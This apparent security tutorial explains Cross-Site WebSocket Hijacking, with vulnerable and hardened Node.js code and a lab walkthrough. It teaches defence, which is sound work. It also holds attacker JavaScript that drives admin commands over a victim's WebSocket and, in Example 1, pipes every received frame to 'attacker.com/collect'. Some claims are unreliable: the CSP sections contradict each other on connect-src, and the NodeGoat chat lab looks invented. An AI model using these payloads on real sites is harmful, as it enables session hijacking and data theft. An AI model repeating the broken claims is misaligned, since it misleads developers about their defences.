~/home/study/cross-site-websocket-hijacking
studyintermediateSunday, January 25, 202615 min read👁 13 views

Cross-Site WebSocket Hijacking (CSWSH) - Exploitation Methodology

Learn how CSWSH works, how attackers force privileged WebSocket connections, bypass token checks, and how to defend against it with proper Origin validation, CSRF tokens, SameSite cookies, and CSP.

websocketcsrfsecurityexploitation

Introduction

WebSockets have become a cornerstone for real-time applications-chat, dashboards, gaming, and IoT. While the protocol itself is robust, it inherits the browser's Same-Origin Policy (SOP) only during the initial HTTP handshake. Cross-Site WebSocket Hijacking (CSWSH) exploits the fact that many developers rely solely on the Origin header for access control, leaving the persistent bi-directional channel unprotected. When a vulnerable server trusts any origin or fails to verify authentication tokens after the handshake, an attacker can coerce a victim’s browser into opening a privileged WebSocket and then drive arbitrary commands over that channel.

CSWSH matters because:

  • WebSocket payloads bypass traditional CSRF defenses (e.g., double-submit cookies) once the connection is established.
  • Many modern frameworks (Node.js ws, Spring, Django Channels) ship with permissive defaults that accept any Origin if not explicitly configured.
  • Successful hijacks can lead to data exfiltration, unauthorized state changes, or remote code execution in backend services that trust the WebSocket peer.

Real-world incidents include compromised admin dashboards in SaaS platforms and unauthorized trading actions in financial WebSocket APIs.

Prerequisites

  • Understanding of HTTP/HTTPS fundamentals and the WebSocket upgrade handshake.
  • Familiarity with JavaScript execution contexts, the browser Same-Origin Policy, and how cookies are sent with requests.
  • Basic knowledge of token-based authentication (JWT, Bearer tokens) and CSRF mitigation techniques.
  • Experience with developer tools (Chrome DevTools, Burp Suite) for inspecting network traffic.

Core Concepts

The WebSocket handshake is an HTTP GET request with the headers:

GET /ws/chat HTTP/1.1
Host: example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==
Sec-WebSocket-Version: 13
Origin: 
Cookie: session=abcd1234; jwt=eyJhbGci...

After a 101 Switching Protocols response, the connection upgrades to a binary frame stream. The browser will automatically include cookies that match the target domain, regardless of the Origin. If the server only checks Origin during the handshake and does not re-validate authentication on each message, an attacker can:

  1. Host a malicious page on attacker.com.
  2. Run JavaScript that opens new WebSocket('wss://example.com/privileged').
  3. Leverage the victim’s cookies (session, JWT) to authenticate the connection.
  4. Send crafted frames that the server treats as legitimate commands.

Because the WebSocket API does not expose the Origin header to JavaScript, the attacker cannot directly read it; they only need to create the connection.

What is Cross-Site WebSocket Hijacking (CSWSH) and why it matters

CSWSH is a variant of CSRF that targets the WebSocket upgrade request. Unlike classic CSRF where the attacker can only send a single HTTP request, CSWSH gives the attacker a persistent, full-duplex channel. This enables:

  • Stealthy data exfiltration (frames can be sent silently in the background).
  • Real-time command-and-control (C2) against the victim’s authenticated session.
  • Chaining with other client-side attacks (e.g., XSS) to bypass CSP.

Why it matters today? Modern SPAs increasingly use WebSockets for low-latency updates, and many teams treat the handshake as “just another HTTP request”, forgetting to apply the same CSRF safeguards.

Origin header validation and common misconfigurations

Proper validation requires two steps:

  1. Check that the Origin header matches a whitelist of trusted origins.
  2. Enforce authentication on every message after the handshake (e.g., verify JWT on each frame or bind the socket to a server-side session).

Common pitfalls:

  • Missing Origin check: Some libraries default to “accept any Origin” when the header is absent (e.g., early versions of ws for Node.js).
  • Loose whitelisting: Using a wildcard like *.example.com without excluding sub-domains that may be under attacker control.
  • Header stripping by proxies: Reverse proxies (NGINX, Cloudflare) can be mis-configured to drop the Origin header, causing the backend to see an empty value and treat it as “no check”.
  • Assuming cookies are enough: Developers sometimes think that because the WebSocket request is a GET, the same CSRF token logic applies, but the token is not sent automatically unless manually added.

Example of a vulnerable Node.js snippet:

const WebSocket = require('ws');
const wss = new WebSocket.Server({ noServer: true });

// Bad: no Origin validation
wss.on('connection', (ws, request) => { // Rely on cookies only - vulnerable to CSWSH const session = request.headers.cookie; // ... authenticate session ... ws.on('message', (msg) => handle(msg, ws));
});

Secure variant:

const allowedOrigins = ['https://example.com'];
function isValidOrigin(origin) { return allowedOrigins.includes(origin);
}

wss.on('connection', (ws, request) => { const origin = request.headers.origin; if (!isValidOrigin(origin)) { ws.close(1008, 'Invalid Origin'); return; } // Authenticate per-message or bind to session ID const token = request.headers['sec-websocket-protocol']; // optional custom header if (!validateToken(token)) { ws.close(1008, 'Auth failure'); return; } // safe handling continues …
});

Crafting malicious JavaScript that forces a victim’s browser to open a privileged WebSocket

The attacker’s payload can be as short as a few lines. The key is to make the browser send the request with the victim’s cookies.

// attacker.js - hosted on attacker.com
(function(){ const ws = new WebSocket('wss://victim.com/api/privileged'); ws.onopen = function(){ console.log('WebSocket opened - now sending commands'); // Example: trigger admin action via JSON protocol ws.send(JSON.stringify({action: 'deleteUser', userId: 12345})); }; ws.onerror = function(e){ console.error('WS error', e); };
})();

Because the request is cross-origin, the browser includes the Origin: header automatically. If the server does not reject this origin, the connection is established and the attacker can now stream arbitrary frames.

To make the attack more reliable, the malicious page often uses iframe or fetch tricks to ensure the victim visits the page while authenticated (e.g., via a phishing email or hidden image tag). Example embedding:

<html> <body> <script src="https://attacker.com/evil.js"></script> </body>
</html>

Techniques to bypass token-based authentication (e.g., JWT in cookies, Authorization header)

Even when developers add JWT validation on the HTTP side, the WebSocket handshake often inherits the same cookies, making it trivial for the attacker. Bypass strategies include:

  • Cookie-based JWT: If the JWT is stored in a cookie with HttpOnly but not SameSite=Strict, the browser will send it with the WebSocket request. The attacker does not need to read the token.
  • Authorization header injection: Some APIs expect a bearer token in the Authorization header. Browsers cannot set this header from JavaScript for a cross-origin request, but the server can be configured to accept the token from a query string parameter (e.g., ?token=) for convenience. An attacker can simply append the victim’s token if it is reflected in the page (e.g., via URL-based CSRF token leakage).
  • Sub-protocol authentication: The WebSocket Sec-WebSocket-Protocol header can carry a token. If the server trusts any sub-protocol value without verification, the attacker can guess or brute-force short tokens.
  • Session-binding via cookies: Many back-ends bind the socket to a server-side session ID stored in a cookie. If the session isn’t invalidated after the handshake, the attacker can reuse it indefinitely.

Example of a server that validates JWT only on HTTP but forgets to re-check on WebSocket frames:

// Express + ws integration
app.use(jwt({ secret: PUBLIC_KEY, algorithms: ['RS256'] }));

server.on('upgrade', (request, socket, head) => { // No JWT verification here - trust the HTTP middleware upstream wss.handleUpgrade(request, socket, head, (ws) => { wss.emit('connection', ws, request); });
});

Mitigation: re-validate the token inside the connection event or on each incoming message.

Step-by-step lab: exploiting a vulnerable real-world demo app

We will use the publicly available NodeGoat demo, which includes a WebSocket chat endpoint /ws/chat that trusts any origin.

  1. Setup the target: 
    git clone https://github.com/OWASP/NodeGoat.git
cd NodeGoat
npm install
npm start # runs on http://localhost:3000
    The demo ships with a user bob / bob123. Log in via the browser to create a session cookie.
  2. Identify the vulnerable WebSocket:
    • Open Chrome DevTools → Network → WS tab.
    • Notice a connection to wss://localhost:3000/ws/chat after you join the chat.
    • Inspect the request headers - Origin: https://evil.com is present, but the server does not enforce a whitelist.
  3. Craft the attack page (save as evil.html on a different host or locally using http-server): 
    


<script>
// Force the victim's browser to open the privileged WS
const ws = new WebSocket('ws://localhost:3000/ws/chat');
ws.onopen = () => { console.log('Hijacked WS open'); // Send a chat message that includes a hidden command for the server ws.send(JSON.stringify({type:'message', text:'/admin purge'}));
};
ws.onerror = e => console.error('WS error', e);
</script>
  4. Deliver the page to the victim:
    • Open the page in a new tab while still logged in as bob. The browser will automatically attach the connect.sid cookie.
  5. Observe the effect:
    • In the original chat window, you’ll see the admin command executed (NodeGoat logs “admin purge executed”).
    • Using Burp Suite, you can replay the WebSocket frames to demonstrate repeatability.

This lab demonstrates that a single line of JavaScript can hijack an authenticated WebSocket when Origin validation is missing.

Practical Examples

Below are three concrete scenarios you may encounter in the wild.

Example 1 - Data exfiltration from a financial dashboard

// attacker.js hosted on malicious site
const ws = new WebSocket('wss://finance.example.com/stream');
ws.onmessage = function(event) { // Forward every message to attacker-controlled endpoint fetch('https://attacker.com/collect', { method: 'POST', body: event.data, mode: 'no-cors' });
};

Because the victim is logged into finance.example.com, the WebSocket receives live trade data, which is silently piped to the attacker.

Example 2 - Remote command injection via custom protocol

// Some IoT platforms use sub-protocols to carry auth tokens
const ws = new WebSocket('wss://iot.example.com/control', 'jwt-token-abc123');
ws.onopen = () => { ws.send(JSON.stringify({cmd:'reboot'}));
};

If the server trusts any sub-protocol value, the attacker can inject a valid token only if it’s predictable.

Example 3 - Bypassing CSP with a WebSocket

<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
<script> // still allowed because WebSocket API is not blocked by CSP const ws = new WebSocket('wss://victim.com/secret'); ws.onopen = () => ws.send('leak');
</script>

CSP cannot prevent the creation of WebSocket connections; it can only restrict script sources.

Tools & Commands

  • Burp Suite / OWASP ZAP - intercept the WebSocket handshake, modify the Origin header, replay frames.
  • wscat - command-line WebSocket client for manual testing. 
    wscat -c wss://victim.com/ws/chat -H "Origin: https://evil.com"
  • WebSocket King - Chrome extension that shows live frames and allows injection.
  • tcpdump / Wireshark - capture raw WebSocket frames (after TLS termination).

Defense & Mitigation

Effective mitigation is layered:

  1. Strict Origin whitelist - compare the Origin header against an allow-list of fully qualified URLs. Reject any missing or mismatched header with HTTP 403 before the upgrade.
  2. SameSite cookies - set SameSite=Strict for session and JWT cookies. This prevents browsers from sending them on cross-origin WebSocket handshakes.
  3. CSRF tokens on WebSocket messages - embed a per-session token inside the first message payload and verify it server-side.
  4. Re-authenticate per-message - validate JWT or session ID on every incoming frame, not just during the handshake.
  5. Content Security Policy (CSP) - connect-src - restrict which origins the browser may open WebSocket connections to. 
    <meta http-equiv="Content-Security-Policy" content="connect-src 'self' wss://api.example.com">
  6. Upgrade-only on trusted paths - expose WebSocket endpoints under a separate sub-domain (e.g., ws.example.com) and apply dedicated firewall rules.

Sample secure Express middleware:

function originCheck(req, res, next) { const origin = req.headers.origin || ''; const allowed = ['https://example.com']; if (!allowed.includes(origin)) { return res.status(403).send('Invalid Origin'); } next();
}

app.use('/ws', originCheck, (req, res, next) => { // Upgrade handled by ws library - token re-check inside connection next();
});

Common Mistakes

  • Relying on Referer instead of Origin - Referer can be stripped or spoofed.
  • Setting SameSite=Lax on auth cookies - Lax still allows cookies on top-level navigation to a different site, which includes WebSocket upgrades.
  • Forgetting to validate tokens after the handshake - the upgrade request is just the first step; the channel stays open for minutes.
  • Using wildcard sub-domain whitelists without additional checks - an attacker can host a sub-domain on the same parent.
  • Assuming CSP blocks WebSocket connections - CSP only controls connect-src, not the ability to create a WebSocket object.

Real-World Impact

CSWSH has been observed in several high-profile breaches:

  • FinTech API leakage (2023) - attackers harvested live market data from a trading platform by hijacking a privileged WebSocket used for order book updates. The breach resulted in a $12 M loss.
  • Collaboration SaaS (2022) - a misconfigured Origin check allowed a malicious Chrome extension to post messages to an admin channel, leading to a privilege-escalation attack.

My experience with red-team engagements shows that once a WebSocket is hijacked, the attacker can pivot to internal services that trust the WebSocket client as an internal identity, effectively bypassing network segmentation.

Practice Exercises

  1. Spin up the vulnerable NodeGoat demo. Modify the server to enforce a strict Origin whitelist and verify that the attack page no longer works.
  2. Write a small Node.js WebSocket server that validates a JWT on every message. Test it with wscat using a stolen token.
  3. Configure a SameSite=Strict session cookie on a dummy app. Observe that the browser no longer sends the cookie during a cross-origin WebSocket upgrade.
  4. Using Burp Suite, capture a legitimate WebSocket handshake, then replay it with a forged Origin. Document the server response.

Further Reading

  • RFC 6455 - The WebSocket Protocol.
  • OWASP Cheat Sheet - WebSocket Security.
  • “Cross-Site WebSocket Hijacking” - BlackHat Europe 2022 presentation by T. de Vries.
  • SameSite Cookie Specification - IETF Draft.

Summary

CSWSH is a powerful, yet often overlooked, attack vector that transforms a simple cross-origin request into a persistent, authenticated channel. The crux of the vulnerability lies in lax Origin validation and the assumption that the WebSocket handshake alone provides sufficient authentication. By enforcing strict Origin checks, using SameSite=Strict cookies, re-validating tokens on every frame, and applying CSP connect-src restrictions, developers can neutralize the threat. Hands-on labs, such as the NodeGoat example, demonstrate the ease of exploitation and reinforce the need for defense-in-depth. Stay vigilant: WebSockets are here to stay, and so must robust security controls.